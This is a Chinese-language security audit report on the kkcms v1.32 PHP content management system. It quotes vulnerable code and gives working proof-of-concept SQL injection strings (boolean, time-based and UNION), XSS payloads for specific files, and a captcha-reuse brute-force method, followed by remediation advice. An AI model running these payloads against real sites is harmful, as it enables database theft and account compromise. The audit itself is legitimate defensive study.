"快看"CMS v1.32代码审计报告<\/h1>

一、环境搭建<\/h2>

源码获取<\/strong>：<\/p>

GitHub地址：https:\/\/github.com\/erichuang2015\/kkcms<\/li>
选择版本：kkcms-v1.32<\/li> <\/ul> <\/li>

环境要求<\/strong>：<\/p>

PHP 5.6.27<\/li>
MySQL 5.5.53<\/li>
推荐使用phpStudy搭建<\/li> <\/ul> <\/li>

安装步骤<\/strong>：<\/p>

解压源码到phpStudy根目录<\/li>
启动phpStudy<\/li>
创建数据库（如kkcms）<\/li>
访问安装页面完成安装<\/li> <\/ul> <\/li> <\/ol>
二、目录结构分析<\/h2>
system\/ # 系统核心目录 inc.php # 核心包含文件 library.php # 库函数 function.php # 功能函数 config.php # 配置文件 ucenter\/ # 用户中心 admin\/ # 后台管理 template\/ # 模板文件 wap\/ # 手机端 <\/code><\/pre> 三、漏洞分析<\/h2> 1. SQL注入漏洞<\/h3> (1) 注册功能注入（ucenter\/reg.php）<\/h4> 漏洞原理<\/strong>：<\/p> 使用stripslashes()<\/code>函数去除转义<\/li> 但前面有addslashes_deep()<\/code>函数添加转义<\/li> 导致"负负得正"效果，转义被取消<\/li> <\/ul> 漏洞代码<\/strong>：<\/p> $username =<\/span> stripslashes<\/span>(trim<\/span>($_POST['name'<\/span>])); <\/span><\/span>$query =<\/span> mysql_query<\/span>("select u_id from xtcms_user where u_name='<\/span>$username<\/span>'"<\/span>); <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> name=<\/span>1<\/span>' AND 2309=2309 AND '<\/span>tslg'='<\/span>tslg <\/span><\/span>name=<\/span>1<\/span>' AND (SELECT 3775 FROM (SELECT(SLEEP(5)))OXGU) AND '<\/span>XUOn'='<\/span>XUOn <\/span><\/span><\/code><\/pre>影响文件<\/strong>：<\/p> ucenter\/reg.php<\/li> ucenter\/active.php<\/li> ucenter\/repass.php<\/li> wap\/login.php<\/li> <\/ul> (2) 模板文件注入（template\/wapian\/vlist.php）<\/h4> 漏洞原理<\/strong>：<\/p> 未引入转义处理文件<\/li> 直接拼接SQL查询<\/li> <\/ul> 漏洞代码<\/strong>：<\/p> $result =<\/span> mysql_query<\/span>('select * from xtcms_vod_class where c_pid='<\/span>.<\/span>$_GET['cid'<\/span>].<\/span>' order by c_sort desc,c_id asc'<\/span>); <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> cid=<\/span>1<\/span>) UNION<\/span> ALL<\/span> SELECT<\/span> NULL<\/span>,NULL<\/span>,CONCAT(0<\/span>x7162717a71,0<\/span>x4572725a7062476e5a734c4f51454742724f4579755449744967454b6a695461545a4857576a7952,0<\/span>x7170706271),NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>,NULL<\/span>-- - <\/span><\/span><\/span><\/code><\/pre>(3) 后台删除功能注入（admin\/model\/usergroup.php）<\/h4> 漏洞原理<\/strong>：<\/p> 后台删除操作未过滤参数<\/li> 虽然引入转义文件但仍有注入<\/li> <\/ul> 漏洞代码<\/strong>：<\/p> $sql =<\/span> 'delete from xtcms_user_group where ug_id = '<\/span> .<\/span> $_GET['del'<\/span>] .<\/span> ''<\/span>; <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> ?<\/span>del=<\/span>2<\/span>%<\/span>20<\/span>and<\/span>%<\/span>20<\/span>sleep(10<\/span>) <\/span><\/span><\/code><\/pre>2. XSS漏洞<\/h3> (1) 存储型XSS（youlian.php）<\/h4> 漏洞原理<\/strong>：<\/p> 内容字段经过转义处理但最终无效<\/li> 数据存储后直接输出<\/li> <\/ul> 漏洞代码<\/strong>：<\/p> $data['content'<\/span>] =<\/span>addslashes<\/span>($_POST['content'<\/span>]); <\/span><\/span>\/\/ 存储后直接输出 <\/span><\/span><\/span><\/span>echo<\/span> $row['content'<\/span>]; <\/span><\/span><\/code><\/pre>利用payload<\/strong>：<\/p> <script<\/span>>alert<\/span>(\/123456\/<\/span>)<\/script<\/span>> <\/span><\/span><\/code><\/pre>(2) 反射型XSS（admin\/cms_kamilist.php）<\/h4> 漏洞原理<\/strong>：<\/p> GET参数直接输出<\/li> 无有效过滤<\/li> <\/ul> 漏洞代码<\/strong>：<\/p> echo<\/span> '?cpass='<\/span>.<\/span>$_GET["id"<\/span>]; <\/span><\/span><\/code><\/pre>利用payload<\/strong>：<\/p> ?id="><script<\/span>>alert<\/span>(\/1\/<\/span>)<\/script<\/span>> <\/span><\/span><\/code><\/pre>(3) 多文件反射型XSS<\/h4> 影响文件<\/strong>：<\/p> \/wap\/shang.php<\/li> \/wap\/movie.php<\/li> \/wap\/tv.php<\/li> \/wap\/zongyi.php<\/li> \/wap\/dongman.php<\/li> <\/ul> 利用payload<\/strong>：<\/p> ?m="><script<\/span>>alert<\/span>(\/wowowo\/<\/span>)<\/script<\/span>> <\/span><\/span><\/code><\/pre>3. 验证码重用漏洞（admin\/cms_login.php）<\/h3> 漏洞原理<\/strong>：<\/p> 验证码无时效限制<\/li> 可重用验证码进行爆破<\/li> <\/ul> 漏洞代码<\/strong>：<\/p> if<\/span> ($_SESSION['verifycode'<\/span>] !=<\/span> $_POST['verifycode'<\/span>]) { <\/span><\/span> alert_href<\/span>('验证码错误'<\/span>,'cms_login.php'<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p> 获取有效验证码<\/li> 使用Burp Suite固定验证码进行爆破<\/li> <\/ol> 4. 文件上传漏洞<\/h3> 参考链接<\/strong>： https:\/\/blog.csdn.net\/qq_44713013\/article\/details\/122187203<\/p> 四、漏洞修复建议<\/h2> SQL注入修复<\/strong>：<\/p> 统一使用预处理语句<\/li> 避免直接拼接SQL<\/li> 检查所有stripslashes()使用场景<\/li> <\/ul> <\/li> XSS修复<\/strong>：<\/p> 输出时使用htmlspecialchars()过滤<\/li> 严格限制用户输入内容<\/li> 实现CSP策略<\/li> <\/ul> <\/li> 验证码修复<\/strong>：<\/p> 添加时效限制（如60秒过期）<\/li> 使用后立即销毁session<\/li> 增加验证码复杂度<\/li> <\/ul> <\/li> 架构改进<\/strong>：<\/p> 统一安全过滤机制<\/li> 避免"负负得正"的安全逻辑<\/li> 实现权限最小化原则<\/li> <\/ul> <\/li> <\/ol> 五、审计经验总结<\/h2> 重点关注<\/strong>：<\/p> 用户输入直接拼接SQL的地方<\/li> 未过滤直接输出的变量<\/li> 验证码等安全机制实现<\/li> <\/ul> <\/li> 审计技巧<\/strong>：<\/p> 全局搜索敏感函数（如mysql_query、echo $_GET等）<\/li> 跟踪变量传递过程<\/li> 检查包含文件的安全机制<\/li> <\/ul> <\/li> 常见问题<\/strong>：<\/p> 转义函数使用不当<\/li> 过滤逻辑存在缺陷<\/li> 安全机制可被绕过<\/li> <\/ul> <\/li> 学习建议<\/strong>：<\/p> 深入理解PHP安全函数<\/li> 学习主流框架的安全机制<\/li> 建立系统的审计方法论<\/li> <\/ul> <\/li> <\/ol> 本报告详细分析了"快看"CMS v1.32版本中存在的多种安全漏洞，包括SQL注入、XSS、验证码缺陷等，并提供了相应的修复建议。审计过程中发现该CMS存在多处"负负得正"的安全逻辑缺陷，值得开发人员引以为戒。<\/p>